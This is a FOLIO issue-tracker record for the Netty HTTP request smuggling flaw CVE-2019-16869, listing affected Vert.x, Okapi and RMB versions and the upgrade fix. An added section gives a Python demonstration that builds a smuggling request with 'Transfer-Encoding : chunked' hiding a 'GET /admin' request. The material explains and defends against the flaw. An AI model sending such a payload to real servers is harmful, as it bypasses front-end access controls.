[FOLIO-2368] Netty HTTP request smuggling security vulnerability CVE-2019-16869 Created: 28/Nov/19 Updated: 10/Aug/20 Resolved: 15/Jun/20 |
|
| Status: | Closed |
| Project: | FOLIO |
| Components: | None |
| Affects versions: | None |
| Fix versions: | None |
| Type: | Bug | Priority: | P2 |
| Reporter: | Julian Ladisch | Assignee: | Unassigned |
| Resolution: | Done | Votes: | 0 |
| Labels: | security | ||
| Remaining Estimate: | Not Specified | ||
| Time Spent: | Not Specified | ||
| Original estimate: | Not Specified | ||
| Issue links: |
|
| Sprint: | DevOps: Sprint 95 | ||||||||||||
| Development Team: | Core: Platform | ||||||||||||
| Description |
|
Netty before 4.1.42.Final mishandles whitespace before the colon in HTTP headers (such as a "Transfer-Encoding : chunked" line), which leads to HTTP request smuggling.

CVSS 3.x severity and metrics: https://nvd.nist.gov/vuln/detail/CVE-2019-16869

Fix: update Netty to 4.1.42.Final.

Affected components:
Vert.x below 3.8.3 uses Netty 4.1.39.Final and is affected.
Okapi below 2.34.0 uses Vert.x 3.8.1 and is affected: https://github.com/folio-org/okapi/pull/849
RMB up to 29.0.1 uses Vert.x 3.8.1 and is affected: https://github.com/folio-org/raml-module-builder/blob/07c76c4/pom.xml#L69
All modules that use an RMB version up to 29.0.1 are affected. |
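The parsing disagreement that turns the lenient header handling into request smuggling, as an added example; this is not code from the issue, from Netty, Vert.x, Okapi or RMB. It models three parsers for the same request: a front end that takes the field name literally (so "Transfer-Encoding " with a trailing space is just an unknown header and the body is framed by Content-Length; that front-end behaviour is an assumption, since an RFC 7230 conformant proxy would reject the line), a back end that strips whitespace before the colon the way the issue describes for Netty before 4.1.42.Final (so it honours chunked encoding and leaves the smuggled bytes on the connection), and the strict behaviour of the fix. The request, the host name okapi.example and the smuggled GET /admin are constructed for the demonstration.

```python
"""CL.TE request smuggling via whitespace before the header colon.

Models the parser behaviours discussed in FOLIO-2368 / CVE-2019-16869;
it is illustrative code, not Netty's implementation.
"""
import re

# RFC 7230 3.2: header-field = field-name ":" OWS field-value OWS, and a
# field-name is a token, which cannot contain whitespace.  RFC 7230 3.2.4
# says a server MUST reject a request with whitespace before the colon.
TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")


class BadRequest(ValueError):
    """Raised by the strict parser for a malformed header line."""


def parse_headers(raw, mode):
    """Split an HTTP/1.1 request into (headers, body) under one of three modes.

    'literal': keep the field name as written (hypothetical front end).
    'trim':    strip whitespace around the field name before matching it
               (the pre-4.1.42.Final behaviour the issue describes).
    'strict':  reject any field name that is not a token (the fix).
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:       # skip the request line
        name, sep, value = line.partition(b":")
        if not sep:
            raise BadRequest("header line without a colon: %r" % line)
        name = name.decode("latin-1")
        if mode == "trim":
            name = name.strip()
        elif mode == "strict" and not TOKEN.match(name):
            raise BadRequest("illegal field-name %r" % name)
        headers[name.lower()] = value.strip().decode("latin-1")
    return headers, body


def frame_body(headers, body):
    """Apply RFC 7230 3.3.3 framing: chunked Transfer-Encoding wins over
    Content-Length.  Returns (bytes belonging to this request, leftover)."""
    if headers.get("transfer-encoding", "").lower() == "chunked":
        pos, out = 0, b""
        while True:
            nl = body.index(b"\r\n", pos)
            size = int(body[pos:nl], 16)
            pos = nl + 2
            if size == 0:                       # last chunk, then empty trailer
                pos = body.index(b"\r\n", pos) + 2
                return out, body[pos:]
            out += body[pos:pos + size]
            pos += size + 2                     # data plus its CRLF
    n = int(headers.get("content-length", "0"))
    return body[:n], body[n:]


def frame(raw, mode):
    """Parse and frame one request; what is left over would be read by the
    back end as the start of the *next* request on the connection."""
    headers, body = parse_headers(raw, mode)
    return frame_body(headers, body)


def is_rejected(raw, mode):
    """True if the parser in the given mode refuses the request outright."""
    try:
        parse_headers(raw, mode)
    except BadRequest:
        return True
    return False


# Constructed attacker request.  The Content-Length covers the whole body, so
# a front end that ignores the malformed Transfer-Encoding line forwards all
# of it; a back end that honours chunked encoding stops after "0\r\n\r\n".
SMUGGLED = b"GET /admin HTTP/1.1\r\nFoo: bar\r\n\r\n"
BODY = b"0\r\n\r\n" + SMUGGLED
REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: okapi.example\r\n"                   # hypothetical host
    b"Content-Length: " + str(len(BODY)).encode() + b"\r\n"
    b"Transfer-Encoding : chunked\r\n"           # whitespace before the colon
    b"\r\n" + BODY
)

if __name__ == "__main__":
    print("front end (literal):", frame(REQUEST, "literal"))
    print("back end  (trim):   ", frame(REQUEST, "trim"))
    print("fixed     (strict): rejected =", is_rejected(REQUEST, "strict"))
```

Run stand-alone, the script shows the front end forwarding the complete body as one request while the trimming back end consumes only the empty chunked body and keeps `GET /admin ...` as the prefix of the next request, which is the desynchronisation the advisory refers to; the strict mode, matching the 4.1.42.Final fix, rejects the request before any framing decision is made.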
| Comments |
| Comment by Julian Ladisch [ 15/Jun/20 ] |
|
The minimum RMB version for Fameflower was 29.3.0: https://folio-org.atlassian.net/wiki/display/COMMUNITY/Q1+2020+%28Fameflower%29+Release+Notes |